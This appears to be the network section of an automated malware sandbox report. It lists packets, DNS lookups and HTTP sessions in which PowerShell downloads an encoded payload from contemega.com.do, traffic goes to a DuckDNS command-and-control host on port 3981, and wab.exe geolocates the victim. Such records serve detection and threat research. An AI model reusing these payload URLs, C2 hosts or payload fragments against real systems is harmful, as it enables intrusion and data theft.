Jul 1, 2024 16:20:09.867475986 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.867496967 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.867501020 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.867515087 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.867527008 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.867539883 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.867542982 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.867567062 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.867670059 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.867682934 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.867712021 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.867759943 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.867770910 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.867783070 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.867794037 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.867799044 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.867806911 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.867815018 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.867819071 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.867830992 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.867846966 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.867882013 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.868089914 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.868103027 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.868113995 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.868124962 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.868136883 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.868149042 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.868151903 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.868170977 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.868191957 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.868375063 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.868386030 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.868397951 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.868408918 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.868421078 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.868428946 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.868432999 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.868443966 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.868448973 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.868455887 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.868469000 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.868474960 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.868489027 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.868503094 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.868530989 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.868899107 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.868910074 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.868957996 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.870672941 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.870698929 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.870712042 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.870744944 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.870851994 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.870862961 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.870873928 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.870887041 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.870893002 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.870898962 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.870913982 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.870939970 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.906089067 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.906126022 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.906137943 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.906166077 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.906202078 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.906214952 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.906225920 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.906238079 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.906241894 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.906260967 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.914736986 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.914773941 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.914791107 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.914792061 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.914829016 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.914829969 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.914843082 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.914859056 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.914871931 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.914879084 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.914908886 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.914983034 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.915097952 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.915108919 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.915121078 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.915131092 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.915142059 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.915143967 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.915154934 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.915169954 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.915199995 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:12.776828051 CEST | 3981 | 60919 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:12.791511059 CEST | 60919 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:12.796439886 CEST | 3981 | 60919 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:13.511673927 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:13.516612053 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:13.516627073 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:13.516661882 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:13.516691923 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:13.516696930 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:13.516706944 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:13.516730070 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:13.516855001 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:13.516864061 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:13.516882896 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:13.516891956 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:13.516966105 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:13.517005920 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:13.522711039 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:13.522758007 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:13.522767067 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:13.522800922 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:13.523289919 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:13.523299932 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:13.523303986 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:13.549299955 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:13.554451942 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:13.554505110 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:31.358753920 CEST | 3981 | 60919 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:31.403569937 CEST | 60919 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:37.576643944 CEST | 60918 | 443 | 192.168.2.9 | 192.185.112.252
Jul 1, 2024 16:20:37.576968908 CEST | 60919 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:37.577112913 CEST | 60921 | 80 | 192.168.2.9 | 178.237.33.50
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 1, 2024 16:19:06.040702105 CEST | 62969 | 53 | 192.168.2.9 | 1.1.1.1
Jul 1, 2024 16:19:06.153840065 CEST | 53 | 62969 | 1.1.1.1 | 192.168.2.9
Jul 1, 2024 16:19:19.478301048 CEST | 53 | 53190 | 1.1.1.1 | 192.168.2.9
Jul 1, 2024 16:19:33.223593950 CEST | 53 | 58996 | 162.159.36.2 | 192.168.2.9
Jul 1, 2024 16:19:33.708933115 CEST | 54598 | 53 | 192.168.2.9 | 1.1.1.1
Jul 1, 2024 16:19:33.717116117 CEST | 53 | 54598 | 1.1.1.1 | 192.168.2.9
Jul 1, 2024 16:19:50.674932957 CEST | 53396 | 53 | 192.168.2.9 | 1.1.1.1
Jul 1, 2024 16:19:50.788693905 CEST | 53 | 53396 | 1.1.1.1 | 192.168.2.9
Jul 1, 2024 16:19:55.511687994 CEST | 52213 | 53 | 192.168.2.9 | 1.1.1.1
Jul 1, 2024 16:19:56.497560024 CEST | 52213 | 53 | 192.168.2.9 | 1.1.1.1
Jul 1, 2024 16:19:57.513597965 CEST | 52213 | 53 | 192.168.2.9 | 1.1.1.1
Jul 1, 2024 16:19:59.528898001 CEST | 52213 | 53 | 192.168.2.9 | 1.1.1.1
Jul 1, 2024 16:20:01.536102057 CEST | 53 | 52213 | 1.1.1.1 | 192.168.2.9
Jul 1, 2024 16:20:01.536118031 CEST | 53 | 52213 | 1.1.1.1 | 192.168.2.9
Jul 1, 2024 16:20:01.536137104 CEST | 53 | 52213 | 1.1.1.1 | 192.168.2.9
Jul 1, 2024 16:20:01.536145926 CEST | 53 | 52213 | 1.1.1.1 | 192.168.2.9
Jul 1, 2024 16:20:01.538413048 CEST | 52258 | 53 | 192.168.2.9 | 1.1.1.1
Jul 1, 2024 16:20:02.544224024 CEST | 52258 | 53 | 192.168.2.9 | 1.1.1.1
Jul 1, 2024 16:20:03.544358015 CEST | 52258 | 53 | 192.168.2.9 | 1.1.1.1
Jul 1, 2024 16:20:05.570324898 CEST | 52258 | 53 | 192.168.2.9 | 1.1.1.1
Jul 1, 2024 16:20:06.150541067 CEST | 53 | 52258 | 1.1.1.1 | 192.168.2.9
Jul 1, 2024 16:20:06.150625944 CEST | 53 | 52258 | 1.1.1.1 | 192.168.2.9
Jul 1, 2024 16:20:06.151247978 CEST | 53 | 52258 | 1.1.1.1 | 192.168.2.9
Jul 1, 2024 16:20:06.151258945 CEST | 53 | 52258 | 1.1.1.1 | 192.168.2.9
Jul 1, 2024 16:20:08.028290033 CEST | 59779 | 53 | 192.168.2.9 | 1.1.1.1
Jul 1, 2024 16:20:08.037326097 CEST | 53 | 59779 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 1, 2024 16:19:06.040702105 CEST | 192.168.2.9 | 1.1.1.1 | 0xf5d | Standard query (0) | contemega.com.do | A (IP address) | IN (0x0001) | false
Jul 1, 2024 16:19:33.708933115 CEST | 192.168.2.9 | 1.1.1.1 | 0x7c27 | Standard query (0) | 171.39.242.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Jul 1, 2024 16:19:50.674932957 CEST | 192.168.2.9 | 1.1.1.1 | 0xa4b7 | Standard query (0) | contemega.com.do | A (IP address) | IN (0x0001) | false
Jul 1, 2024 16:19:55.511687994 CEST | 192.168.2.9 | 1.1.1.1 | 0x4bfe | Standard query (0) | janbours92harbu02.duckdns.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 16:19:56.497560024 CEST | 192.168.2.9 | 1.1.1.1 | 0x4bfe | Standard query (0) | janbours92harbu02.duckdns.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 16:19:57.513597965 CEST | 192.168.2.9 | 1.1.1.1 | 0x4bfe | Standard query (0) | janbours92harbu02.duckdns.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 16:19:59.528898001 CEST | 192.168.2.9 | 1.1.1.1 | 0x4bfe | Standard query (0) | janbours92harbu02.duckdns.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 16:20:01.538413048 CEST | 192.168.2.9 | 1.1.1.1 | 0x729e | Standard query (0) | janbours92harbu02.duckdns.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 16:20:02.544224024 CEST | 192.168.2.9 | 1.1.1.1 | 0x729e | Standard query (0) | janbours92harbu02.duckdns.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 16:20:03.544358015 CEST | 192.168.2.9 | 1.1.1.1 | 0x729e | Standard query (0) | janbours92harbu02.duckdns.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 16:20:05.570324898 CEST | 192.168.2.9 | 1.1.1.1 | 0x729e | Standard query (0) | janbours92harbu02.duckdns.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 16:20:08.028290033 CEST | 192.168.2.9 | 1.1.1.1 | 0x4b1a | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 1, 2024 16:19:06.153840065 CEST | 1.1.1.1 | 192.168.2.9 | 0xf5d | No error (0) | contemega.com.do | | 192.185.112.252 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 16:19:33.717116117 CEST | 1.1.1.1 | 192.168.2.9 | 0x7c27 | Name error (3) | 171.39.242.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Jul 1, 2024 16:19:50.788693905 CEST | 1.1.1.1 | 192.168.2.9 | 0xa4b7 | No error (0) | contemega.com.do | | 192.185.112.252 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 16:20:01.536102057 CEST | 1.1.1.1 | 192.168.2.9 | 0x4bfe | Server failure (2) | janbours92harbu02.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Jul 1, 2024 16:20:01.536118031 CEST | 1.1.1.1 | 192.168.2.9 | 0x4bfe | Server failure (2) | janbours92harbu02.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Jul 1, 2024 16:20:01.536137104 CEST | 1.1.1.1 | 192.168.2.9 | 0x4bfe | Server failure (2) | janbours92harbu02.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Jul 1, 2024 16:20:01.536145926 CEST | 1.1.1.1 | 192.168.2.9 | 0x4bfe | Server failure (2) | janbours92harbu02.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Jul 1, 2024 16:20:06.150541067 CEST | 1.1.1.1 | 192.168.2.9 | 0x729e | No error (0) | janbours92harbu02.duckdns.org | | 206.123.148.194 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 16:20:06.150625944 CEST | 1.1.1.1 | 192.168.2.9 | 0x729e | No error (0) | janbours92harbu02.duckdns.org | | 206.123.148.194 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 16:20:06.151247978 CEST | 1.1.1.1 | 192.168.2.9 | 0x729e | No error (0) | janbours92harbu02.duckdns.org | | 206.123.148.194 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 16:20:06.151258945 CEST | 1.1.1.1 | 192.168.2.9 | 0x729e | No error (0) | janbours92harbu02.duckdns.org | | 206.123.148.194 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 16:20:08.037326097 CEST | 1.1.1.1 | 192.168.2.9 | 0x4b1a | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                        • contemega.com.do
                                        • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 60921 | 178.237.33.50 | 80 | 1712 | C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp | Bytes transferred | Direction | Data
Jul 1, 2024 16:20:08.043937922 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                                        Host: geoplugin.net
                                        Cache-Control: no-cache
Jul 1, 2024 16:20:08.676223040 CEST | 1170 | IN | HTTP/1.1 200 OK
                                        date: Mon, 01 Jul 2024 14:20:08 GMT
                                        server: Apache
                                        content-length: 962
                                        content-type: application/json; charset=utf-8
                                        cache-control: public, max-age=300
                                        access-control-allow-origin: *
                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                        Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49707 | 192.185.112.252 | 443 | 7548 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-01 14:19:06 UTC | 176 | OUT | GET /Nedslagnings.dwp HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Host: contemega.com.do
                                        Connection: Keep-Alive
2024-07-01 14:19:06 UTC | 261 | IN | HTTP/1.1 200 OK
                                        Date: Mon, 01 Jul 2024 14:19:06 GMT
                                        Server: Apache
                                        Upgrade: h2,h2c
                                        Connection: Upgrade, close
                                        Last-Modified: Mon, 01 Jul 2024 07:48:56 GMT
                                        Accept-Ranges: bytes
                                        Content-Length: 478448
                                        content-Security-Policy: upgrade-insecure-requests
                                        2024-07-01 14:19:06 UTC7931INData Raw: 32 66 73 50 61 4f 44 72 51 69 35 69 76 53 74 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 65 6d 6e 41 41 41 41 44 2b 6e 46 33 73 76 72 56 61 65 58 59 77 38 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 36 59 77 2f 59 36 57 59 50 32 50 33 72 51 41 70 4f 31 6a 37 58 31 39 66 58 31 39 66
                                        Data Ascii: 2fsPaODrQi5ivStlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZemnAAAAD+nF3svrVaeXYw8nJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJyc6Yw/Y6WYP2P3rQApO1j7X19fX19f
                                        2024-07-01 14:19:06 UTC8000INData Raw: 35 65 58 6c 35 65 58 6c 35 65 58 6c 35 65 58 6c 35 44 34 47 36 41 41 41 41 5a 67 2f 72 2f 64 6a 53 36 31 4d 76 50 43 4a 77 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 5a 75 62 5a 67 39 7a 39 73 76 72 56 68 6c 53 4d 41 66 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50
                                        Data Ascii: 5eXl5eXl5eXl5eXl5D4G6AAAAZg/r/djS61MvPCJw/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/ZubZg9z9svrVhlSMAf4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+P
                                        2024-07-01 14:19:06 UTC8000INData Raw: 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 71 42 38 69 4e 57 50 71 76 5a 36 49 66 32 36 31 54 66 44 67 56 46 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 2f 70 72 67 41 41 41 4e 6e 51 5a 67 2f 70 2f 75 73 2b 51 64 34 75 44 5a 71 61 6d 70 71 61 6d 70 71 61 6d 70 71 61 6d 70 71 61 6d 70 71 61 6d 70 71 61 6d 70 71 61 6d 70
                                        Data Ascii: 6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enqB8iNWPqvZ6If261TfDgVFT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0/prgAAANnQZg/p/us+Qd4uDZqampqampqampqampqampqampqampqamp
